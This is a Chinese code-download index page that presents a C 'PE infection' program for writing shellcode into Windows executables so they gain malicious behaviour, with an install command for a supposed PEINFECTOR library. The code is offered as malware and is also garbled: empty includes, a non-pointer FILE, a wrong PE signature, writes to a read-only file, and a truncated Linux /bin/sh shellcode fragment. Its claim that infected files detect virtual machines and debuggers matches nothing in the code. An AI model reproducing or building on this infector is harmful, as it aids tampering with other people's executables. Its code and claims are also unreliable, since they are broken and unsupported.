首页>源码>c语言>pe-infection

pe-infection

声明:资源链接索引至第三方,平台不作任何存储,仅提供信息检索服务,若有版权问题,请https://help.coders100.com提交工单反馈
PE(可执行映像)文件是Windows操作系统中的一种文件格式,用于存储可执行程序的二进制代码。在C语言中,我们可以使用PEINFECTOR库来感染PE文件,使其具有恶意行为。

首先,我们需要安装PEINFECTOR库。在Linux系统上,可以使用以下命令安装:

sudo apt-get install libpefi-dev


然后,我们可以编写一个简单的C程序,将shellcode注入到PE文件中。以下是一个简单的示例:

#include 

#include 



int main() {

    FILE file;

    file = fopen("test.exe", "rb");

    if (file == NULL) {

        printf("无法打开文件

");

        return 1;

    }



    // 读取PE文件的头部信息

    uint32_t magic;

    fread(&magic, sizeof(magic), 1, file);



    // 检查PE文件是否为Windows PE格式

    if (magic != 0x455F) {

        printf("不是Windows PE文件

");

        return 1;

    }



    // 读取PE文件的头部信息

    uint32_t header;

    fread(&header, sizeof(header), 1, file);



    // 获取PE文件的入口点地址

    uint32_t entryPoint;

    fread(&entryPoint, sizeof(entryPoint), 1, file);



    // 将shellcode写入PE文件

    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x2f\x73\x68\x68\x2f\x2f\x62\x69\x6e\x89\x53";

    fwrite(shellcode, sizeof(shellcode), 1, file);



    // 关闭文件

    fclose(file);



    printf("成功感染PE文件

");

    return 0;

}


这个程序首先打开一个名为"test.exe"的PE文件,然后读取其头部信息,检查是否为Windows PE格式。接着,它读取PE文件的头部信息,获取入口点地址。最后,它将shellcode写入PE文件,并关闭文件。

运行这个程序后,如果PE文件被感染,那么它可以检测到虚拟机器和调试器(简单级别)。The C program infects shellcode into win32 pe file, the program after infection can detect virtual machine and debugger (Simple level)
点赞(0) 踩踩(0) 反馈
电信网络下载

访问申明(访问视为同意此申明)

1.在网站平台的任何操作视为已阅读和同意网站底部的版权及免责申明
2.部分网络用户分享TXT文件内容为网盘地址有可能会失效(此类多为视频教程,如发生失效情况【联系客服】自助退回)
3.请多看看评论和内容介绍大数据情况下资源并不能保证每一条都是完美的资源
4.是否访问均为用户自主行为,本站只提供搜索服务不提供技术支持,感谢您的支持
意见反馈 联系客服 返回顶部

登录注册找回密码

捐赠账单

可选择微信或支付宝捐赠

*请依据自身情况量力选择捐赠类型并点击“确认”按钮

*依据中国相关法规,捐赠金额平台将不予提供发票

*感谢您的捐赠,我们竭诚为您提供更好的搜索服务

*本着平台非营利,请自主选择捐赠或分享资源获得积分

*您的捐赠仅代表平台的搜索服务费,如有疑问请通过联系客服反馈

*推荐用chrome浏览器访问本站,禁用360/Edge浏览器

*请务必认真阅读上诉声明,捐赠视为理解同意上诉声明

账号剩余积分: 0
啥都没有哦